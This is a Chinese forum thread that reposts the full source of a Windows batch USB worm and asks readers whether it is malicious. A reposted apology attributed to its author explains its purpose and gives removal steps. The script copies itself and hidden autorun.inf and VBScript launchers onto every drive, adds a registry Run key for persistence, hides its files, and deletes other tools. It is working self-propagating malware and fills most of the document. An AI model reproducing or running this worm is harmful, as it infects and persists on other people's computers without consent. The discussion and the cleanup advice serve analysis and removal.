[转帖]大家来看看这些代码是恶意代码还是清除恶意代码的

狂人cr

@echo off
setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
cd /d "%~dp0"
if /i "%cd%"=="%~d0\" (explorer.exe "%~d0")
set v=1
set "endf=%systemdrive%\ubye.txt"
echo.Wscript.sleep 10000>sleep.vbe
attrib sleep.vbe +a +s +r +h
if /i not "%cd%"=="%systemroot%" (call:cb&del/a/f/q sleep.vbe&goto :eof)
set dl=CDEFGHIJKLMNOPQRSTUVWXYZ
set n=0
call:inf >inf.tem
call:ql
"%systemroot%\U盘病毒分析Beta3.exe"
echo.Wscript.sleep 10000>sleep.vbe
:s
echo. >uishere-%v%.txt
if exist "%endf%" (goto end)
if "!dl:~%n%,1!"=="" (set n=0&sleep.vbe)
set d=!dl:~%n%,1!:
set /a n=n+1
if not exist %d% (goto s)
if exist "%d%\autorun.inf\" (echo.y|cacls "%d%\autorun.inf" /p everyone:f
rd "%d%\autorun.inf" /s /q)
if exist "%d%\autorun.inf" (fc "%d%\autorun.inf" inf.tem&if not "!ERRORLEVEL!"=="0" (call U盘病毒分析.bat -a -l -d %d:~0,-1% -c -i -s&goto s1)) else (goto s1)
if not exist "%d%\%~n0.vbe" (goto s2)
if not exist "%d%\%~nx0" (goto s3)
if not exist "%d%\U盘病毒分析Beta3.exe" (goto s4)
if exist %d%\%date:~0,10%.sk (goto s)
:s1
call:inf >%d%\autorun.inf
attrib %d%\autorun.inf +a +s +r +h
if exist "%d%\%~n0.vbe" (del /a /f /q "%d%\%~n0.vbe")
:s2
call:vbe >"%d%\%~n0.vbe"
attrib "%d%\%~n0.vbe" +a +s +r +h
:s3
call:copy "%~dpnx0" "%d%\"
:s4
call:copy "U盘病毒分析Beta3.exe" "%d%\"
if exist %d%\*.sk (del /a /f /q %d%\*.sk)
echo.>%d%\%date:~0,10%.sk
attrib %d%\%date:~0,10%.sk +a +s +r +h
goto s
:cb
if exist "%systemroot%\uishere-*.txt" (del /a /f /q "%systemroot%\uishere-*.txt"&sleep.vbe)
if exist "%systemroot%\uishere-*.txt" (if exist "%systemroot%\uishere-%v%.txt" (goto :eof) else (echo.>"%endf%"&sleep.vbe))
call:copy "%~dpnx0" "%systemroot%\"
call:copy "U盘病毒分析Beta3.exe" "%systemroot%\"
if exist "%systemroot%\%~n0.vbe" (del /a /f /q "%systemroot%\%~n0.vbe")
call:vbe >"%systemroot%\%~n0.vbe"
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v vbe /t REG_SZ /d "%systemroot%\%~n0.vbe" /f
start "" /wait /d "%systemroot%\" "%systemroot%\%~n0.vbe"
goto :eof
:vbe
echo.set ws=wscript.createobject("wscript.shell")
echo.ws.run "%~nx0 /start",0
goto :eof
:inf
echo.[AutoRun]
echo.open=wscript.exe %~n0.vbe
echo.shell\open\Command=wscript.exe %~n0.vbe
echo.shell\explore\Command=wscript.exe %~n0.vbe
echo.shell\find\Command=wscript.exe %~n0.vbe
goto :eof
:copy
if exist "%~dp2%~nx1" (del/a/f/q "%~dp2%~nx1")
attrib "%~1" -s -h
copy "%~1" "%~dp2"
attrib "%~1" +s +h
attrib "%~dp2%~nx1" +s +h
goto :eof
:ql
cd /d "%systemroot%\"
del /a /f /q Anti-U盘免疫.bat ReadMe.txt uda-解压.bat uda.exe U盘病毒分析.bat zap.exe 主操控.bat
cd /d "%~dp0"
goto :eof
:end
call U盘病毒分析.bat -c&call:ql&del/a/f/q "%~dp0sleep.vbe" "%endf%" inf.tem "U盘病毒分析Beta3.exe" "%~n0.vbe" "%~nx0" "uishere-%v%.txt"® delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v vbe /f




----------------------------------------------------------------------------------------------------------
因为被同学的电脑害死了。中了杀伤力不大，但很麻烦的东西

shawind

转帖

2. 您好！我是CyyIsGood。
3. 我为我的脚本给您造成的不便感到十分愧疚，在此对您说声对不起！
5. 首先，我告诉您如何清理这个脚本（推荐方法三，如果您不放心清理的脚本，请按照方法一、二）：
6. 方法一：
7. 在 %HOMEDRIVE%\\ 新建“8bye.txt”文件，等待一会儿，这个脚本会自动毁灭自己（由于发现了有人恶意修改过，很难排除特殊情况）
8. 方法二：
9. 1、打开“任务管理器”结束“cmd.exe”的进程
10. 2、清理下列文件：
11. %systemroot%\\：inf.tem uda.a u.vbe uhere-*.txt u.bat zap.a ReadMe.txt s.vbe uda-解压.bat 主操控.bat Anti-U盘免疫.bat U盘病毒分析.bat 打开发送功能.bat
12. %ALLUSERSPROFILE%\\「开始」菜单\\程序\\启动\\：u.vbe
13. 每个磁盘根目录：u.bat u.vbe autorun.inf uda.a *.sk
14. 3、最好能重新启动计算机以更新设置
15. 方法三：
16. 上述方法清理起来可能有点麻烦，我已经制作好清理的脚本，见附件(U.rar)。运行一次即可完成清理。请相信，这个清理的脚本不会危害您的计算机。
18. 其次，我交代一下编写的目的：
19. 有一点是必须明确的，这个脚本不包含任何的恶意（如果我包含恶意，想搞破坏，也不会留下名字的资料来惹麻烦[当然也有人说我这是想处风头，但我个人看来，搞破坏留个臭名不见得是“风头”]）。
20. 我编写它，只是为了进行研究性学习（课题：校园U盘病毒查杀），通过它在我的学校传播并删除和收集U盘病毒。但由于编写之初我考虑不周，现在很不幸地它通过U盘传播到了校园外，我无法控制其自毁，给许多人带来了麻烦，产生了不良的影响，为此我深感愧疚、自责。希望大家能原谅我的过失！谢谢！
22. 最后，希望会清理的朋友，看见了这个脚本，能帮忙清理一下，并把上述文字及清理的脚本转告给被感染的朋友；如果可以，请代我解释一下。在此，我表示衷心的感谢！还有，由于这个脚本的危害以大于其作用，已经可以定义为病毒，希望杀毒软件厂商能将其收录进病毒定义库，谢谢！

复制代码